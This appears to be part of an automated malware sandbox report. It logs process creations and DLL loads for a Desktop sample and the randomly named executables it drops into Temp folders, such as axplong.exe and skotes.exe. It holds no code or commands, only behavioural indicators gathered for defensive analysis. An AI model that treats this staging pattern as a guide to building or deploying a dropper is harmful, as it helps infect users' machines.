Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2092,i,2243381234690523858,16077404214973868286,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Process created: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe "C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: feclient.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: advpack.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: mscoree.dll
